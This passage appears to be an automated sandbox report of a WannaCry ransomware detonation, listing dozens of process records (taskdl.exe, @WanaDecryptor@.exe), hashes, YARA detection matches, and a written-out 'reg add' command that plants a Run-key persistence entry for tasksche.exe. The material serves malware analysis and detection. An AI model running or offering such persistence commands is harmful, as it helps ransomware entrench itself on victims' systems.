                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:38
                                                                                      Start time:15:47:52
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:39
                                                                                      Start time:15:47:52
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:40
                                                                                      Start time:15:47:53
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:41
                                                                                      Start time:15:47:53
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:42
                                                                                      Start time:15:47:53
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:43
                                                                                      Start time:15:47:53
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:44
                                                                                      Start time:15:47:53
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:45
                                                                                      Start time:15:47:54
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:46
                                                                                      Start time:15:47:54
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:47
                                                                                      Start time:15:47:54
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:48
                                                                                      Start time:15:47:54
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:49
                                                                                      Start time:15:47:54
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:50
                                                                                      Start time:15:47:55
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:51
                                                                                      Start time:15:47:55
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:52
                                                                                      Start time:15:47:55
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:53
                                                                                      Start time:15:47:55
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:54
                                                                                      Start time:15:47:55
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:55
                                                                                      Start time:15:47:56
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:56
                                                                                      Start time:15:47:56
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:57
                                                                                      Start time:15:47:56
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:58
                                                                                      Start time:15:47:56
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:59
                                                                                      Start time:15:47:56
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:60
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:61
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:62
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:63
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:64
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:65
                                                                                      Start time:15:47:57
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:66
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:67
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:68
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:69
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe co
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      Antivirus matches:
                                                                                      • Detection: 96%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:70
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                                                      Imagebase:0xf20000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:71
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:72
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:73
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:74
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                      Imagebase:0xf20000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:75
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe vs
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:76
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6684c0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:77
                                                                                      Start time:15:47:58
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                      Imagebase:0xc70000
                                                                                      File size:59'392 bytes
                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:78
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:79
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:80
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:81
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Windows\System32\consent.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:consent.exe 5728 686 000001FA36427DE0
                                                                                      Imagebase:0x7ff70de20000
                                                                                      File size:186'704 bytes
                                                                                      MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:82
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:83
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:84
                                                                                      Start time:15:47:59
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
